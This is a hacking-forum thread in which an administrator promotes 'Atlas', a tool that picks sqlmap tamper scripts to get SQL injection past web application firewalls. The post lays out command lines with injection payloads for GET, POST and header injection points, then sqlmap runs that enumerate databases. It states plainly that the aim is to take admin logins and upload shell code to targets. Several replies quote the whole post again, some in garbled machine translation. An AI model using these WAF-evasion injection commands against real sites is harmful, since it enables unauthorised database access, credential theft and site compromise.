💜💜Atlas : Quick SQLMap Tamper Suggester v1.0💜💜

  • 💌Important Message to All Fellas💌

    💌Important Message to All Fellas 💌

    ⚠️Thank you for being with us over the past year.
    To support our community, we're now offering an "Account Upgrade" for purchase.
    VIP and Legendary members get special direct downloads without needing to like or reply to threads. Upgrade now to enjoy these benefits!
    HERE Our Official Telegram

    ⛔ Spam: If someone try SCAM you or SPAM Message to you let me know we will ban them

    🏆 Download Error or Missing Link: Click on threads and report them to Our admin will re-upload for you.

    ☣️ Infected or Backdoor/RAT: If you find a virus, please report it to us via Telegram or click report in the threads, and we will completely ban them in 100%

    🎯 Our Plan : Make resource downloads on a private host without using another free upload because easy gone

    ❤️ We try our best to make everyone's shared tools clean and fresh in here, so enjoy with our fellas. ❤️

DRCrypter

DRCrypter

Administrator
.
.
Jun 3, 2023
Threads
272
399
93
Atlas | Quick SQLMap Tamper Suggester v1.0

Only sqlmap is well-known for its use in database exploitation or injection to obtain login admin or user targets in order to allow attackers to upload shell code to the target.

In 2023, if you ask me, will SQLMap still be working?
I can say that this vulnerability depends on the website code having an error or bug, making it vulnerable to attack DBS. Also, many hackers have found the WordPress plugin SQLi, which means it's still a popular attack method in the OWASP Top 10.

This tool will help you or guide you to recommend a way to bypass because many web apps today have firewalls to protect their DBS. It is not easy to inject or get DBS, but you can try this tool as well. I know it because many red teams or experts use it to help them inject or exploit DBS.

Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.

68747470733a2f2f692e696d6775722e636f6d2f473262584633412e706e67.png

68747470733a2f2f692e696d6775722e636f6d2f49366358534b642e706e67.png


python3 atlas.py (version python3+)

Example : python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

injection point (with %%inject%%):

GET Method : python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

POST Method : python3 atlas.py --url
Please, Log in or Register to view URLs content!
-m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

Headers Method :
python3 atlas.py --url
Please, Log in or Register to view URLs content!
-H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

Tamper Concatenation : python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v


68747470733a2f2f692e696d6775722e636f6d2f5850333952717a2e706e67.png
get Tampers List :

python3 atlas.py -g (help)

Run SQLMap: python3 sqlmap.py -u '
Please, Log in or Register to view URLs content!
' --dbs --random-agent -v 3

Price_ASC') AND 8716=4837 AND ('yajr'='yajr is blocked by WAF/IDS/IPS, now trying with Atlas:

68747470733a2f2f692e696d6775722e636f6d2f553671456e58702e706e67.png

python3 atlas.py --url '
Please, Log in or Register to view URLs content!
' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v

At this point:

python3 sqlmap.py -u '
Please, Log in or Register to view URLs content!
' --dbs --random-agent -v 3 --tamper=versionedkeywords,...

To view the content, you need to Sign In or Register.
 
Last edited:
  • Like
  • Love
Reactions: julvdr, @lrbilool, kevinwgse and 18 others
drcrypter said:
Atlas | Quick SQLMap Tamper Suggester v1.0

Only sqlmap is well-known for its use in database exploitation or injection to obtain login admin or user targets in order to allow attackers to upload shell code to the target.

In 2023, if you ask me, will SQLMap still be working?
I can say that this vulnerability depends on the website code having an error or bug, making it vulnerable to attack DBS. Also, many hackers have found the WordPress plugin SQLi, which means it's still a popular attack method in the OWASP Top 10.

This tool will help you or guide you to recommend a way to bypass because many web apps today have firewalls to protect their DBS. It is not easy to inject or get DBS, but you can try this tool as well. I know it because many red teams or experts use it to help them inject or exploit DBS.

Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.

View attachment 45

View attachment 44


python3 atlas.py (version python3+)

Example : python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

injection point (with %%inject%%):

GET Method : python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

POST Method : python3 atlas.py --url
Please, Log in or Register to view URLs content!
-m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

Headers Method :
python3 atlas.py --url
Please, Log in or Register to view URLs content!
-H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

Tamper Concatenation : python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v


View attachment 46
get Tampers List :

python3 atlas.py -g (help)

Run SQLMap: python3 sqlmap.py -u '
Please, Log in or Register to view URLs content!
' --dbs --random-agent -v 3

Price_ASC') AND 8716=4837 AND ('yajr'='yajr is blocked by WAF/IDS/IPS, now trying with Atlas:

View attachment 47

python3 atlas.py --url '
Please, Log in or Register to view URLs content!
' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v

At this point:

python3 sqlmap.py -u '
Please, Log in or Register to view URLs content!
' --dbs --random-agent -v 3 --tamper=versionedkeywords,...

*** Hidden text: cannot be quoted. ***
Click to expand...
thanks bro
 
DRCrypter said:
Atlas | Quick SQLMap Tamper Suggester v1.0

Only sqlmap is well-known for its use in database exploitation or injection to obtain login admin or user targets in order to allow attackers to upload shell code to the target.

In 2023, if you ask me, will SQLMap still be working?
I can say that this vulnerability depends on the website code having an error or bug, making it vulnerable to attack DBS. Also, many hackers have found the WordPress plugin SQLi, which means it's still a popular attack method in the OWASP Top 10.

This tool will help you or guide you to recommend a way to bypass because many web apps today have firewalls to protect their DBS. It is not easy to inject or get DBS, but you can try this tool as well. I know it because many red teams or experts use it to help them inject or exploit DBS.

Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.

View attachment 45

View attachment 44


python3 atlas.py (version python3+)

Example : python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

injection point (with %%inject%%):

GET Method : python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

POST Method : python3 atlas.py --url
Please, Log in or Register to view URLs content!
-m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

Headers Method :
python3 atlas.py --url
Please, Log in or Register to view URLs content!
-H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

Tamper Concatenation : python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v


View attachment 46
get Tampers List :

python3 atlas.py -g (help)

Run SQLMap: python3 sqlmap.py -u '
Please, Log in or Register to view URLs content!
' --dbs --random-agent -v 3

Price_ASC') AND 8716=4837 AND ('yajr'='yajr is blocked by WAF/IDS/IPS, now trying with Atlas:

View attachment 47

python3 atlas.py --url '
Please, Log in or Register to view URLs content!
' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v

At this point:

python3 sqlmap.py -u '
Please, Log in or Register to view URLs content!
' --dbs --random-agent -v 3 --tamper=versionedkeywords,...

*** Hidden text: cannot be quoted. ***
Click to expand...
t
 
DRCrypter said:
Atlas | Sugestão rápida de violação de SQLMap v1.0

Somente o sqlmap é conhecido por seu uso na exploração ou injeção de banco de dados para obter login de administrador ou alvos de usuário, a fim de permitir que invasores carreguem código shell para o alvo.

Em 2023, se você me perguntar, o SQLMap ainda estará funcionando?
Posso dizer que essa vulnerabilidade depende de o código do site apresentar algum erro ou bug, tornando-o vulnerável a ataques de DBS. Além disso, muitos hackers encontraram o plugin SQLi para WordPress, o que significa que ainda é um método de ataque popular no Top 10 do OWASP.

Esta ferramenta irá ajudá-lo ou orientá-lo a recomendar uma maneira de contornar, porque muitos aplicativos da web hoje possuem firewalls para proteger seu DBS. Não é fácil injetar ou obter DBS, mas você também pode tentar esta ferramenta. Eu sei disso porque muitas equipes vermelhas ou especialistas o usam para ajudá-los a injetar ou explorar DBS.

Atlas é uma ferramenta de código aberto que pode sugerir adulterações de sqlmap para ignorar WAF/IDS/IPS. A ferramenta é baseada no código de status retornado.

View attachment 45

View attachment 44


python3 atlas.py (versão python3+)

Exemplo: python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

ponto de injeção (com %%injetar%%):

Método GET: python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

Método POST: python3 atlas.py --url
Please, Log in or Register to view URLs content!
-m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA " --random-agente -v

Método de cabeçalhos:
python3 atlas.py --url
Please, Log in or Register to view URLs content!
-H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="- 1234 E 4321=4321-- AAAA" --random-agent -v

Concatenação de adulteração: python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" -- agente aleatório -v


View attachment 46
obter lista de adulterações:

python3 atlas.py -g (ajuda)

Execute SQLMap: python3 sqlmap.py -u '
Please, Log in or Register to view URLs content!
' --dbs --random-agent -v 3

Price_ASC') AND 8716=4837 AND ('yajr'='yajr está bloqueado por WAF/IDS/IPS, agora tentando com Atlas:

View attachment 47

python3 atlas.py --url '
Please, Log in or Register to view URLs content!
' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent - v

Neste ponto:

python3 sqlmap.py -u '
Please, Log in or Register to view URLs content!
' --dbs --random-agent -v 3 --tamper=versionedkeywords,. ..

*** Texto oculto: não pode ser citado. ***
Click to expand...
bom
 
DRCrypter said:
Atlas | Quick SQLMap Tamper Suggester v1.0

Only sqlmap is well-known for its use in database exploitation or injection to obtain login admin or user targets in order to allow attackers to upload shell code to the target.

In 2023, if you ask me, will SQLMap still be working?
I can say that this vulnerability depends on the website code having an error or bug, making it vulnerable to attack DBS. Also, many hackers have found the WordPress plugin SQLi, which means it's still a popular attack method in the OWASP Top 10.

This tool will help you or guide you to recommend a way to bypass because many web apps today have firewalls to protect their DBS. It is not easy to inject or get DBS, but you can try this tool as well. I know it because many red teams or experts use it to help them inject or exploit DBS.

Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.

View attachment 45

View attachment 44


python3 atlas.py (version python3+)

Example : python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

injection point (with %%inject%%):

GET Method : python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

POST Method : python3 atlas.py --url
Please, Log in or Register to view URLs content!
-m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

Headers Method :
python3 atlas.py --url
Please, Log in or Register to view URLs content!
-H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

Tamper Concatenation : python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v


View attachment 46
get Tampers List :

python3 atlas.py -g (help)

Run SQLMap: python3 sqlmap.py -u '
Please, Log in or Register to view URLs content!
' --dbs --random-agent -v 3

Price_ASC') AND 8716=4837 AND ('yajr'='yajr is blocked by WAF/IDS/IPS, now trying with Atlas:

View attachment 47

python3 atlas.py --url '
Please, Log in or Register to view URLs content!
' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v

At this point:

python3 sqlmap.py -u '
Please, Log in or Register to view URLs content!
' --dbs --random-agent -v 3 --tamper=versionedkeywords,...

*** Hidden text: cannot be quoted. ***
Click to expand...
errr
 
DRCrypter said:
阿特拉斯| 快速 SQLMap 篡改建议器 v1.0

只有 sqlmap 因其用于数据库利用或注入来获取登录管理员或用户目标而闻名,以便攻击者将 shell 代码上传到目标。

到了 2023 年,如果你问我,SQLMap 还能用吗?
我可以说这个漏洞取决于网站代码有错误或bug,使其容易受到DBS的攻击。此外,许多黑客还发现了 WordPress 插件 SQLi,这意味着它仍然是 OWASP Top 10 中流行的攻击方法。

该工具将帮助您或指导您推荐一种绕过方法,因为当今许多 Web 应用程序都有防火墙来保护其 DBS。注入或获得DBS并不容易,但你也可以尝试这个工具。我知道它是因为许多红队或专家使用它来帮助他们注入或利用 DBS。

Atlas 是一个开源工具,可以建议sqlmap篡改绕过WAF/IDS/IPS,该工具基于返回的状态代码。

View attachment 45

View attachment 44


python3 atlas.py(python3+版本)

示例: python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

注入点(带有%%inject%%):

获取方法:python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

POST方法:python3 atlas.py --url
Please, Log in or Register to view URLs content!
-m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA “--随机代理-v

标头方法:
python3 atlas.py --url
Please, Log in or Register to view URLs content!
-H '用户代理:mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-第1234章 4321=4321--AAAA”--随机代理-v

篡改连接:python3 atlas.py --url
Please, Log in or Register to view URLs content!
--payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --随机代理-v


View attachment 46
获取篡改列表:

python3 atlas.py -g (帮助)

运行 SQLMap: python3 sqlmap.py -u '
Please, Log in or Register to view URLs content!
' --dbs --random-agent -v 3

Price_ASC') AND 8716=4837 AND ('yajr'='yajr 被 WAF/IDS/IPS 阻止,现在尝试使用 Atlas:

View attachment 47

python3 atlas.py --url '
Please, Log in or Register to view URLs content!
' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent - v

在此刻:

python3 sqlmap.py -u '
Please, Log in or Register to view URLs content!
' --dbs --random-agent -v 3 --tamper=versionedkeywords,。..

*** 隐藏文本:无法引用。***

[/剧透]
Click to expand...
Good
 
You must log in or register to reply here.

Forum statistics

Threads
1,838
Messages
35,574
Members
10,368
Latest member
therobber
Member time online
836d 4h 5m
Reputation(s)
26

Share this page

Share this page
Top Bottom
Back